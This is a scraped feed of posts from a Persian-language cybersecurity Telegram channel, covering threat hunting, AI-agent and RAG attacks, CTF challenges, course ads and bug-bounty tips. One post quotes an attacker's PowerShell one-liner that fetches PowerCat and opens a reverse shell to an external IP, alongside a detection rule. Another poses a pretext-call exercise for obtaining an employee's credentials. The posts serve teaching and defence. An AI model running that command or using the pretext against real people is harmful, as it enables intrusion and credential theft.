🧩 گاهی اوقات، مجرمان سایبری تمایل دارند که دستگیر شوند. بیایید یک مثال دیگر و ابزاری را بررسی کنیم که من کمتر در حملات واقعی با آن مواجه شدهام.
🔖 طبق این گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است
◾ یک ابزار متنباز، مشابه Netcat، برای اجرای یک شل معکوس:
همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق میکند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می کنند.
بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
فراموش نکنید که بلوک های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید.
اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
@AiTHB
@RadioZeroPod
🔖 طبق این گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است
◾ یک ابزار متنباز، مشابه Netcat، برای اجرای یک شل معکوس:
powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd
همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق میکند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می کنند.
بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
event_type: "processcreatewin"
AND
cmdline: "powercat"
فراموش نکنید که بلوک های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید.
اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
@AiTHB
@RadioZeroPod
ASEC
Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287) - ASEC
Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287) ASEC
🔥20❤1
Forwarded from TryHackBox ( AI Security )
ا 🔖 : AI Agent Kill Chain را میتوان در هشت مرحله درک کرد.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
ا▪️ : AI agent ها فقط چت بات نیستند.
آنها میتوانند استدلال کنند، برنامه ریزی کنند، ابزارها را فراخوانی کنند، به داده ها دسترسی پیدا کنند، با APIها تعامل داشته باشند و در سیستم های متصل، اقداماتی انجام دهند. این قابلیت، یک سطح حملهی جدید و یک kill chain جدید ایجاد می کند.
درس کلیدی ساده است: AI agentها هرگز نباید مثل اپلیکیشن های معمولی در نظر گرفته شوند.
آنها به دسترسی سختگیرانهی least-privilege، تأیید انسانی برای اقدامات پرریسک، tool allowlists، اجرای ایزوله (isolated execution)، credentials کوتاه مدت، دفاع در برابر prompt injection و ثبت کامل audit logging نیاز دارند.
با گسترش استفادهی سازمانها از agentic AI، فقط ایمن سازی مدل کافی نخواهد بود.
باید خودِ agent، identity آن، tools آن، memory آن، دادههایش و هر سیستمی که به آن دسترسی دارد را ایمن کنید.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
❤6
⭕ سری چالش های SE : هک انسان 1/20
📌 چالش : "تماس IT پشتیبانی"
سناریو:
❓ سوال:
⚠️ این چلنج فقط برای آموزش تشخیص و دفاع در برابر مهندسی اجتماعیه، نه اجرای واقعی روی افراد یا سازمانهای واقعی
@TryHackBox
#مهندسی_اجتماعی
📌 چالش : "تماس IT پشتیبانی"
سناریو:
شما درحال مهندسی اجتماعی هستید و هدفتون دسترسی به اطلاعات داخلی یک شرکت فرضی به نام "Datanova" هست. شما به عنوان یک "کارمند پشتیبانی IT" با خانم/آقای میترا شاهینی، منشی بخش مالی، تماس میگیرید.
📌 هدف: گرفتن یوزرنیم و ریست پسورد ایمیلش (بدون اینکه شک کنه).
📓 اطلاعات از پیش:
◾ شما اسم مدیرش (سهراب فریدونی) رو از لینکدین پیدا کردید.
◾ میدونید شرکت هفته پیش یک آپدیت سیستمی داشته.
◾میترا معمولاً ساعت ۹ صبح سرکاره.
❓ سوال:
> شما چه دیالوگ و استراتژی ای برای این تماس استفاده می کنید تا میترا بهتون اعتماد کنه؟ (متن دقیق مکالمه یا حداقل ۳-۴ تاکتیکی که به کار میبرید رو تو کامنت بنویسید).
⚠️ این چلنج فقط برای آموزش تشخیص و دفاع در برابر مهندسی اجتماعیه، نه اجرای واقعی روی افراد یا سازمانهای واقعی
@TryHackBox
#مهندسی_اجتماعی
❤5👍1
Forwarded from TryHackBox ( AI Security )
معماری RAG: طراحی، امنیت و حملات
RAG (Retrieval-Augmented Generation) یک معماری ترکیبی است که بازیابی اطلاعات (Retrieval) را با تولید زبان طبیعی (Generation) ادغام میکند تا پاسخهای دقیقتر و مبتنی بر داده تولید کند.
اجزای اصلی معماری
1. Query Encoder: تبدیل پرسش کاربر به Vector Embedding معنایی.
2. Retriever: جستجو در Vector Database (مانند FAISS یا ChromaDB) برای یافتن اسناد مرتبط.
3. Generator: مدل زبانی (مانند GPT یا BART) که پاسخ را بر اساس اسناد بازیابیشده تولید میکند.
4. Knowledge Base: مخزن خارجی اسناد متنی که دانش سیستم را بهروز نگه میدارد.
فرآیند عملیاتی
کاربر سوال میپرسد → سوال به بردار تبدیل میشود → Retriever اسناد مرتبط را بازیابی میکند → Generator پاسخ نهایی را تولید میکند.
حملات رایج به RAG
1. Knowledge Poisoning: تزریق دادههای مخرب به پایگاه دانش برای انحراف پاسخها.
2. Indirect Prompt Injection: دستکاری ورودی کاربر برای تغییر رفتار Retriever یا Generator.
3. Cross-Tenant Leakage: دسترسی غیرمجاز به دادههای کاربران دیگر در سیستمهای چندمستاجره.
چالشهای امنیتی
- Data Integrity: اطمینان از صحت و اعتبار اسناد بازیابیشده.
- Access Control: جلوگیری از دسترسی به دادههای حساس یا طبقهبندیشده.
- Hallucination Mitigation: کاهش توهمهای مدل با استفاده از منابع معتبر.
معماری RAG با ترکیب Semantic Search و Language Generation، پل میان دانش خارجی و قدرت تولید مدلهای زبانی است، اما نیازمند لایههای دفاعی چندگانه برای مقابله با حملات نوظهور است.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
RAG (Retrieval-Augmented Generation) یک معماری ترکیبی است که بازیابی اطلاعات (Retrieval) را با تولید زبان طبیعی (Generation) ادغام میکند تا پاسخهای دقیقتر و مبتنی بر داده تولید کند.
اجزای اصلی معماری
1. Query Encoder: تبدیل پرسش کاربر به Vector Embedding معنایی.
2. Retriever: جستجو در Vector Database (مانند FAISS یا ChromaDB) برای یافتن اسناد مرتبط.
3. Generator: مدل زبانی (مانند GPT یا BART) که پاسخ را بر اساس اسناد بازیابیشده تولید میکند.
4. Knowledge Base: مخزن خارجی اسناد متنی که دانش سیستم را بهروز نگه میدارد.
فرآیند عملیاتی
کاربر سوال میپرسد → سوال به بردار تبدیل میشود → Retriever اسناد مرتبط را بازیابی میکند → Generator پاسخ نهایی را تولید میکند.
حملات رایج به RAG
1. Knowledge Poisoning: تزریق دادههای مخرب به پایگاه دانش برای انحراف پاسخها.
2. Indirect Prompt Injection: دستکاری ورودی کاربر برای تغییر رفتار Retriever یا Generator.
3. Cross-Tenant Leakage: دسترسی غیرمجاز به دادههای کاربران دیگر در سیستمهای چندمستاجره.
چالشهای امنیتی
- Data Integrity: اطمینان از صحت و اعتبار اسناد بازیابیشده.
- Access Control: جلوگیری از دسترسی به دادههای حساس یا طبقهبندیشده.
- Hallucination Mitigation: کاهش توهمهای مدل با استفاده از منابع معتبر.
معماری RAG با ترکیب Semantic Search و Language Generation، پل میان دانش خارجی و قدرت تولید مدلهای زبانی است، اما نیازمند لایههای دفاعی چندگانه برای مقابله با حملات نوظهور است.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
❤5
Forwarded from Try Hack Box
Media is too big
VIEW IN TELEGRAM
📌 دوره: راهنمای جامع ابزار Mimikatz
💢 توضیحات دوره: Mimikatz بدون شک یکی از مهم ترین و موثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می گیرد.این ابزار توسط برنامه نویس فرانسوی Benjamin Delpy ایجاد شد.او در ابتدا Mimikatz را برای یادگیری عمیق تر زبان C و درک بهتر مکانیزم های امنیتی ویندوز توسعه داد.
این ابزار با بهره برداری هوشمند از ضعف های موجود در معماری ویندوز،مجموعهای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می دهد. Mimikatz کار را برای متخصصان بسیار آسان تر کرده است؛به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی،می توان از آن برای گسترش دسترسی در شبکه های مبتنی بر ویندوز استفاده کرد.این ابزار همچنان فعالانه به روزرسانی میشود و تکنیک های جدید به آن اضافه می گردد.
📌 توضیحات کامل
◽مدرس : مهندس سجاد تیموری
◽مدت زمان دوره : ۵ ساعت ۲۰ دقیقه
◻ دوره : آفلاین
⭕ دوره دارای گروه پشتیبانی می باشد.
💰قیمت : ۲,۰۰۰,۰۰۰ تومان
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان
📌 جهت خرید،به ایدی زیر پیام دهید:
@ThbxSupport
Group
@TryHackBox
💢 توضیحات دوره: Mimikatz بدون شک یکی از مهم ترین و موثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می گیرد.این ابزار توسط برنامه نویس فرانسوی Benjamin Delpy ایجاد شد.او در ابتدا Mimikatz را برای یادگیری عمیق تر زبان C و درک بهتر مکانیزم های امنیتی ویندوز توسعه داد.
این ابزار با بهره برداری هوشمند از ضعف های موجود در معماری ویندوز،مجموعهای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می دهد. Mimikatz کار را برای متخصصان بسیار آسان تر کرده است؛به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی،می توان از آن برای گسترش دسترسی در شبکه های مبتنی بر ویندوز استفاده کرد.این ابزار همچنان فعالانه به روزرسانی میشود و تکنیک های جدید به آن اضافه می گردد.
📌 توضیحات کامل
◽مدرس : مهندس سجاد تیموری
◽مدت زمان دوره : ۵ ساعت ۲۰ دقیقه
◻ دوره : آفلاین
⭕ دوره دارای گروه پشتیبانی می باشد.
💰
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان
📌 جهت خرید،به ایدی زیر پیام دهید:
@ThbxSupport
Group
@TryHackBox
👍3👎2
دوستان اگر علاقه مند به فعالیت در تیم ما هستید البته به صورت داوطلب ، پیام دهید :
@ThbxSupport
@ThbxSupport
👎3
TryHackBox CTF 1.zip
26.5 KB
TryHackBox #CTF #1
سطح : خیلی آسان
یه چالش امنیت سایبری آماده کردیم! دو فایل زیر رو دانلود کنید و فلگ رو پیدا کنید 👇
راهنمای چالش:
ارسال فلگ به :
@Unique_exploitbot
#CTF #TryHackBox #CyberSecurity
@TryHackBox
سطح : خیلی آسان
یه چالش امنیت سایبری آماده کردیم! دو فایل زیر رو دانلود کنید و فلگ رو پیدا کنید 👇
/ TryHackBox CTF 1.Zip
|
| __ tryhackbox_challenge.png
|_ _ challenge.zip
راهنمای چالش:
۱. فایل challenge.zip رمزدار هست.فرمت فلگ:
۲. رمز داخل فایل tryhackbox_challenge.png هست دقت کنید که همه چیز تو یه عکس همیشه فقط ظاهرش نیست .
۳. وقتی زیپ رو باز کردید، داخلش یه متن هست که هنوز فلگ نهایی نیست یه مرحله دیکد دیگه لازمه.
TryHackBox{...}
ارسال فلگ به :
@Unique_exploitbot
#CTF #TryHackBox #CyberSecurity
@TryHackBox
❤2
فراخوان همکاری داوطلبانه طراح UI/UX
در حال توسعه یک پلتفرم آموزشی امنیت سایبری هستیم و برای تکمیل تیم، از یک طراح UI/UX دعوت میکنیم بهصورت داوطلبانه در کنار ما همکاری کند.
هدف ما طراحی یک رابط کاربری مدرن، ساده و کاربرپسند است که تجربهای حرفهای برای کاربران و علاقهمندان حوزه امنیت سایبری فراهم کند.
مهارتهای موردنیاز
تسلط بر طراحی رابط کاربری (UI)
آشنایی با اصول تجربه کاربری (UX)
توانایی کار با Figma یا ابزارهای مشابه
طراحی صفحات ریسپانسیو و مدرن
آشنایی با Design System و Componentها
اگر به ساخت یک پروژه واقعی، توسعه رزومه و همکاری در کنار یک تیم فعال در حوزه امنیت سایبری علاقهمند هستید، خوشحال میشویم در کنار ما باشید.
مزایای همکاری
ثبت نام و نقش شما در تیم پروژه و معرفی در بخش همکاران (پس از انتشار)
ساخت نمونهکار (Portfolio) واقعی و قابل ارائه
دریافت گواهی همکاری پس از مشارکت مؤثر در پروژه
اولویت برای همکاری های آینده و پروژههای تجاری و درآمدزا
امکان شبکه سازی
مشارکت در ساخت محصولی که توسط هزاران کاربر مورد استفاده قرار خواهد گرفت
این همکاری در حال حاضر داوطلبانه است و هدف، ساخت یک پلتفرم آموزشی ارزشمند برای جامعه امنیت سایبری است. اعضای اولیه تیم، نقش مهمی در شکلگیری و توسعه آینده این پروژه خواهند داشت و در صورت تبدیل پروژه به یک فعالیت تجاری، اعضای فعال تیم در اولویت همکاری های بعدی خواهند بود.
در صورت تمایل به همکاری، لطفاً از طریق پیام خصوصی با ما در ارتباط باشید.
@ThbxSupport
در حال توسعه یک پلتفرم آموزشی امنیت سایبری هستیم و برای تکمیل تیم، از یک طراح UI/UX دعوت میکنیم بهصورت داوطلبانه در کنار ما همکاری کند.
هدف ما طراحی یک رابط کاربری مدرن، ساده و کاربرپسند است که تجربهای حرفهای برای کاربران و علاقهمندان حوزه امنیت سایبری فراهم کند.
مهارتهای موردنیاز
تسلط بر طراحی رابط کاربری (UI)
آشنایی با اصول تجربه کاربری (UX)
توانایی کار با Figma یا ابزارهای مشابه
طراحی صفحات ریسپانسیو و مدرن
آشنایی با Design System و Componentها
اگر به ساخت یک پروژه واقعی، توسعه رزومه و همکاری در کنار یک تیم فعال در حوزه امنیت سایبری علاقهمند هستید، خوشحال میشویم در کنار ما باشید.
مزایای همکاری
ثبت نام و نقش شما در تیم پروژه و معرفی در بخش همکاران (پس از انتشار)
ساخت نمونهکار (Portfolio) واقعی و قابل ارائه
دریافت گواهی همکاری پس از مشارکت مؤثر در پروژه
اولویت برای همکاری های آینده و پروژههای تجاری و درآمدزا
امکان شبکه سازی
مشارکت در ساخت محصولی که توسط هزاران کاربر مورد استفاده قرار خواهد گرفت
این همکاری در حال حاضر داوطلبانه است و هدف، ساخت یک پلتفرم آموزشی ارزشمند برای جامعه امنیت سایبری است. اعضای اولیه تیم، نقش مهمی در شکلگیری و توسعه آینده این پروژه خواهند داشت و در صورت تبدیل پروژه به یک فعالیت تجاری، اعضای فعال تیم در اولویت همکاری های بعدی خواهند بود.
در صورت تمایل به همکاری، لطفاً از طریق پیام خصوصی با ما در ارتباط باشید.
@ThbxSupport
❤5
TryHackBox_Challenge01.zip
6.6 KB
🚩 TryHackBox | چالش #1: Broken Login Portal
📂 دسته: Web / SQL Injection
🎯 سطح: متوسط
🏳️ فرمت فلگ: THB{...}
سناریو:
فایل های چالش: 👇 (ضمیمه همین پست)
شامل سورس اپ + Dockerfile برای اجرای آسان + README کامل با راهنمای راهاندازی.
نحوه اجرا:
یا
بعد برید به: http://localhost:5000
فلگ رو دقیقاً با فرمت THB{...} به بات ارسال کنید.
@Unique_exploitbot
راهنمایی هم داخل README هست، اگه گیر کردید نگاه کنید.
موفق باشید!
نظرتون راجب این ctf کامنت کنید .
@TryHackBox
📂 دسته: Web / SQL Injection
🎯 سطح: متوسط
🏳️ فرمت فلگ: THB{...}
سناریو:
یک شرکت فرضی یک پورتال مدیریت داخلی ساخته و مدعیه که ورودی های کاربر رو فیلتر کرده و امن هست. وظیفه شما به عنوان پنتستر: نشون بدید این ادعا درست نیست.
هدف نهایی: پیدا کردن فلگ مخفی شده در سیستم.
فایل های چالش: 👇 (ضمیمه همین پست)
شامل سورس اپ + Dockerfile برای اجرای آسان + README کامل با راهنمای راهاندازی.
نحوه اجرا:
docker build -t tryhackbox-c1 .
docker run -p 5000:5000 tryhackbox-c1
یا
pip install -r requirements.txt
python3 app.py
بعد برید به: http://localhost:5000
فلگ رو دقیقاً با فرمت THB{...} به بات ارسال کنید.
@Unique_exploitbot
راهنمایی هم داخل README هست، اگه گیر کردید نگاه کنید.
موفق باشید!
نظرتون راجب این ctf کامنت کنید .
@TryHackBox
❤8
Forwarded from رادیو زیرو پاد
خبرنامه TryHackBox | رادیو زیرو پاد
@RadioZeroPod | @TryHackBox
📌 آیا عامل هوش مصنوعی OpenAI واقعاً Hugging Face را هک کرد؟
🎙 راوی : ARVIN
🆔 @RadioZeroPod
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @AiTHB
در هر قسمت، مهم ترین اخبار و رویدادهای دنیای امنیت سایبری، هوش مصنوعی، هک، آسیبپذیری ها و فناوری را به زبان ساده و با تحلیل فنی بررسی میکنیم تا همیشه از آخرین اتفاقات این حوزه باخبر باشید.
🎙 راوی : ARVIN
🆔 @RadioZeroPod
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @AiTHB
🚀 دعوت به همکاری داوطلبانه در تیم TryHackBox
آیا به امنیت سایبری، آموزش و اشتراک دانش علاقهمند هستید؟
تیم TryHackBox در حال توسعه یک جامعه و پلتفرم تخصصی در حوزه Cyber Security است؛ هدف ما ایجاد بستری برای یادگیری عملی، تولید محتوای تخصصی، انتشار پژوهش ها، پادکست های امنیتی، مسیرهای آموزشی، چالش ها و پروژههای فنی است.
برای توسعه تیم، از افراد علاقهمند و متخصص دعوت میکنیم به صورت داوطلبانه همراه ما باشند.
🔹 موقعیت های همکاری:
RedTeam
Pentest
Ai Security
Networking & linux
📚 تولید محتوا و آموزش
• نویسنده مقالات امنیتی
• مدرس و طراح مسیرهای یادگیری
• مترجم منابع تخصصی
• تولیدکننده محتوای آموزشی
• گوینده و تهیه کننده پادکست های امنیتی
• پژوهشگر و تحلیلگر اخبار و ترندهای امنیت سایبری
💻 توسعه و فناوری
• برنامه نویس Backend / Frontend و Ui
• توسعه ابزارهای امنیتی
• DevOps و زیرساخت
🎯 شرایط همکاری:
✅ علاقهمند به رشد جامعه امنیت سایبری
✅ توانایی کار تیمی و مسئولیتپذیری
✅ علاقه به یادگیری و انتقال تجربه
🎁 مزایای همکاری:
⭐ عضویت در تیم TryHackBox
⭐ ساخت رزومه و برند شخصی در حوزه امنیت
⭐ معرفی فعالیت ها و دستاوردها در جامعه TryHackBox
⭐ همکاری در تولید مقالات، پادکست ها، آموزش ها و پروژههای تخصصی
⭐ دریافت گواهی همکاری
اگر علاقهمند هستید در ساخت یک جامعه امنیتی قدرتمند نقش داشته باشید، خوشحال میشویم شما را در تیم TryHackBox ببینیم.
🔗 درخواست همکاری:
@Thbxsupport
#TryHackBox #CyberSecurity #InfoSec #RedTeam #BlueTeam
آیا به امنیت سایبری، آموزش و اشتراک دانش علاقهمند هستید؟
تیم TryHackBox در حال توسعه یک جامعه و پلتفرم تخصصی در حوزه Cyber Security است؛ هدف ما ایجاد بستری برای یادگیری عملی، تولید محتوای تخصصی، انتشار پژوهش ها، پادکست های امنیتی، مسیرهای آموزشی، چالش ها و پروژههای فنی است.
برای توسعه تیم، از افراد علاقهمند و متخصص دعوت میکنیم به صورت داوطلبانه همراه ما باشند.
🔹 موقعیت های همکاری:
RedTeam
Pentest
Ai Security
Networking & linux
📚 تولید محتوا و آموزش
• نویسنده مقالات امنیتی
• مدرس و طراح مسیرهای یادگیری
• مترجم منابع تخصصی
• تولیدکننده محتوای آموزشی
• گوینده و تهیه کننده پادکست های امنیتی
• پژوهشگر و تحلیلگر اخبار و ترندهای امنیت سایبری
💻 توسعه و فناوری
• برنامه نویس Backend / Frontend و Ui
• توسعه ابزارهای امنیتی
• DevOps و زیرساخت
🎯 شرایط همکاری:
✅ علاقهمند به رشد جامعه امنیت سایبری
✅ توانایی کار تیمی و مسئولیتپذیری
✅ علاقه به یادگیری و انتقال تجربه
🎁 مزایای همکاری:
⭐ عضویت در تیم TryHackBox
⭐ ساخت رزومه و برند شخصی در حوزه امنیت
⭐ معرفی فعالیت ها و دستاوردها در جامعه TryHackBox
⭐ همکاری در تولید مقالات، پادکست ها، آموزش ها و پروژههای تخصصی
⭐ دریافت گواهی همکاری
اگر علاقهمند هستید در ساخت یک جامعه امنیتی قدرتمند نقش داشته باشید، خوشحال میشویم شما را در تیم TryHackBox ببینیم.
🔗 درخواست همکاری:
@Thbxsupport
#TryHackBox #CyberSecurity #InfoSec #RedTeam #BlueTeam
❤5
🛡️ا : AMSI Bypass و چالشهای اجرای PowerShell در محیطهای ویندوزی
یکی از چالش های مهم در محیط های Windows، درک مکانیزم های دفاعی مانند AMSI (Antimalware Scan Interface) و سیاستهای اجرایی PowerShell است.
در این پست بررسی کردیم:
🔹 ا : AMSI چیست و چرا بسیاری از تکنیکها و ابزارها بدون در نظر گرفتن آن شناسایی میشوند؟
🔹 مهاجمان چگونه با محدودیتهای امنیتی PowerShell مواجه میشوند؟
🔹 روشهای رایج بررسی و عبور از مکانیزمهای دفاعی
🔹 نکات مهم اجرایی و همچنین دیدگاههای دفاعی برای شناسایی و مقابله
📌 مطالعه کامل در:
https://lnkd.in/p/ds-fzfjj
#TryHackBox #CyberSecurity #PowerShell #AMSI #RedTeam #WindowsSecurity #InfoSec
یکی از چالش های مهم در محیط های Windows، درک مکانیزم های دفاعی مانند AMSI (Antimalware Scan Interface) و سیاستهای اجرایی PowerShell است.
در این پست بررسی کردیم:
🔹 ا : AMSI چیست و چرا بسیاری از تکنیکها و ابزارها بدون در نظر گرفتن آن شناسایی میشوند؟
🔹 مهاجمان چگونه با محدودیتهای امنیتی PowerShell مواجه میشوند؟
🔹 روشهای رایج بررسی و عبور از مکانیزمهای دفاعی
🔹 نکات مهم اجرایی و همچنین دیدگاههای دفاعی برای شناسایی و مقابله
📌 مطالعه کامل در:
https://lnkd.in/p/ds-fzfjj
اگر این نوع محتوا برای شما مفید است، با دنبال کردن صفحه LinkedIn TryHackBox و حمایت از طریق لایک و اشتراکگذاری، به رشد این مسیر کمک کنید.منتظر مطالب تخصصی تر، تحقیقات امنیتی، پادکست ها و محتوای آموزشی جدید باشید.
#TryHackBox #CyberSecurity #PowerShell #AMSI #RedTeam #WindowsSecurity #InfoSec
LinkedIn
#redteam #amsi #powershell #defenseevasion #activedirectory #cybersecurity #blueteam | TryHackBox Org
بایپس AMSI & Defense Evasion
🛡️ اولین قدم در Red Team: بایپس مکانیزم های دفاعی ویندوز
یکی از اولین چالش های هر Red Teamer در محیط های ویندوزی، مقابله با AMSI (Antimalware Scan Interface) و سیاست های اجرایی PowerShell است.
📌 چرا AMSI مهمه؟ AMSI یک…
🛡️ اولین قدم در Red Team: بایپس مکانیزم های دفاعی ویندوز
یکی از اولین چالش های هر Red Teamer در محیط های ویندوزی، مقابله با AMSI (Antimalware Scan Interface) و سیاست های اجرایی PowerShell است.
📌 چرا AMSI مهمه؟ AMSI یک…
🔥5
🔥 نکتهای برای باگ بانتی: بایپس احراز هویت
بسیاری از توسعه دهندگان بر روی محافظت های پیچیده در قسمت جلویی (فرانتاند) تمرکز میکنند، در حالی که قسمت پشتی (بکاند) را کاملاً باز می گذارند.
بررسی های سریع که نتیجه بخش هستند:
آنها را در ابتدای هر برنامه تست کنید.
علاقه خود را به این پست ها با 🔥 نشان دهید.
@TryHackBox
#باگ_بانتی
بسیاری از توسعه دهندگان بر روی محافظت های پیچیده در قسمت جلویی (فرانتاند) تمرکز میکنند، در حالی که قسمت پشتی (بکاند) را کاملاً باز می گذارند.
بررسی های سریع که نتیجه بخش هستند:
1. دسترسی مستقیم به بخش مدیریت
تلاش کنید تا به آدرس های /admin، /dashboard، /panel، /cp بدون ورود به سیستم دسترسی پیدا کنید.
اغلب، هیچ تغییر مسیری (redirect) یا بررسی احراز هویت مناسبی وجود ندارد.
2. بایپس احراز هویت دو مرحلهای (2FA)
- با تغییر درخواست، مرحلهی 2FA را دور بزنید (پارامتر 2fa را حذف کنید یا آن را روی true تنظیم کنید).
- پس از اولین مرحلهی موفق، درخواست ورود به سیستم را دوباره ارسال کنید.
- سعی کنید از پارامترهایی مانند ?bypass=1 یا پارامترهای پنهان مشابه استفاده کنید.
3. افشای توکن بازنشانی رمز عبور
بررسی کنید که آیا توکن بازنشانی رمز عبور در پاسخ JSON، کد منبع صفحه یا ایمیل تأییدیه قبل از کلیک کاربر بر روی لینک، نمایش داده میشود یا خیر.
نکتهی مهم: این باگ های "ساده" بسیار رایج تر از اکسپلویت های پیچیده هستند و اغلب منجر به آسیبپذیری های حیاتی و بانتی های خوبی می شوند.
آنها را در ابتدای هر برنامه تست کنید.
علاقه خود را به این پست ها با 🔥 نشان دهید.
@TryHackBox
#باگ_بانتی
🔥22❤2👍1
دورک های مفید برای باگ هانترها که میتوانند از آنها برای پیدا کردن اطلاعات حساس استفاده کنند: 👇🏻
📌 در:
https://lnkd.in/p/dF-jW4mR
@TryHackBox
#باگ_بانتی
📌 در:
https://lnkd.in/p/dF-jW4mR
اگر این نوع محتوا برای شما مفید است، با دنبال کردن صفحه LinkedIn TryHackBox و حمایت از طریق لایک و اشتراکگذاری، به رشد این مسیر کمک کنید.
@TryHackBox
#باگ_بانتی
LinkedIn
#dork #google_dork #bugbounty | TryHackBox Org
دورک های مفید برای باگ هانترها که میتوانند از آنها برای پیدا کردن اطلاعات حساس استفاده کنند: 👇🏻
#Dork #google_dork #bugBounty
#Dork #google_dork #bugBounty
👍6❤1
📢 فراخوان همکاری داوطلبانه
در حال توسعه یک پلتفرم آموزشی امنیت سایبری هستیم و برای تکمیل تیم، از افراد علاقهمند و متخصص دعوت میکنیم بهصورت داوطلبانه در کنار ما همکاری کنند و در ساخت یک پروژه آموزشی ارزشمند برای جامعه امنیت سایبری نقش داشته باشند.
🔹 موقعیتهای همکاری
🛡 متخصص امنیت وب (Web Security)
اگر در حوزه امنیت وب و تست نفوذ تجربه دارید، به کمک شما برای بررسی، تحلیل و ایمن سازی بخش Authentication و موارد دیگر و طراحی راهکارهای اصولی امنیتی نیاز داریم.
مهارت های موردنیاز:
آشنایی با امنیت احراز هویت (Authentication) و مدیریت نشست (Session Management)
تسلط بر استانداردهای OWASP و آسیبپذیری های رایج وب
تجربه در تست نفوذ وب و تحلیل باگهای امنیتی
آشنایی با طراحی مکانیزم های امن ورود، ثبت نام و مدیریت کاربران
🎨 طراح UI/UX
به دنبال یک طراح خلاق هستیم تا در طراحی یک رابط کاربری مدرن، ساده و کاربرپسند برای پلتفرم همکاری کند.
مهارت های موردنیاز:
تسلط بر طراحی رابط کاربری (UI)
آشنایی با اصول تجربه کاربری (UX)
توانایی کار با Figma یا ابزارهای مشابه
طراحی صفحات ریسپانسیو و مدرن
آشنایی با Design System و Componentها
🎁 مزایای همکاری
عضویت در تیم توسعه پروژه
معرفی در بخش همکاران پروژه (پس از انتشار)
دریافت گواهی همکاری پس از مشارکت مؤثر
ساخت رزومه و نمونهکار (Portfolio) واقعی
شبکه سازی و همکاری با متخصصان امنیت سایبری
تخفیف ویژه برای دورههای آموزشی و کتابهای تخصصی
امکان دریافت دورهها یا کتابهای منتخب بهصورت رایگان (بر اساس میزان مشارکت)
اولویت همکاری در پروژه های آینده و فرصت های تجاری احتمالی
مشارکت در ساخت محصولی که توسط هزاران کاربر مورد استفاده قرار خواهد گرفت
📌 این همکاری در حال حاضر کاملاً داوطلبانه است. هدف ما ساخت یک پلتفرم آموزشی باکیفیت برای جامعه امنیت سایبری است. اعضای اولیه تیم، نقش مهمی در شکلگیری آینده پروژه خواهند داشت و در صورت تبدیل پروژه به یک فعالیت تجاری، در اولویت همکاری های بعدی قرار میگیرند.
📩 در صورت علاقه به همکاری، از طریق پیام خصوصی با ما در ارتباط باشید:
@ThbxSupport
در حال توسعه یک پلتفرم آموزشی امنیت سایبری هستیم و برای تکمیل تیم، از افراد علاقهمند و متخصص دعوت میکنیم بهصورت داوطلبانه در کنار ما همکاری کنند و در ساخت یک پروژه آموزشی ارزشمند برای جامعه امنیت سایبری نقش داشته باشند.
🔹 موقعیتهای همکاری
🛡 متخصص امنیت وب (Web Security)
اگر در حوزه امنیت وب و تست نفوذ تجربه دارید، به کمک شما برای بررسی، تحلیل و ایمن سازی بخش Authentication و موارد دیگر و طراحی راهکارهای اصولی امنیتی نیاز داریم.
مهارت های موردنیاز:
آشنایی با امنیت احراز هویت (Authentication) و مدیریت نشست (Session Management)
تسلط بر استانداردهای OWASP و آسیبپذیری های رایج وب
تجربه در تست نفوذ وب و تحلیل باگهای امنیتی
آشنایی با طراحی مکانیزم های امن ورود، ثبت نام و مدیریت کاربران
🎨 طراح UI/UX
به دنبال یک طراح خلاق هستیم تا در طراحی یک رابط کاربری مدرن، ساده و کاربرپسند برای پلتفرم همکاری کند.
مهارت های موردنیاز:
تسلط بر طراحی رابط کاربری (UI)
آشنایی با اصول تجربه کاربری (UX)
توانایی کار با Figma یا ابزارهای مشابه
طراحی صفحات ریسپانسیو و مدرن
آشنایی با Design System و Componentها
🎁 مزایای همکاری
عضویت در تیم توسعه پروژه
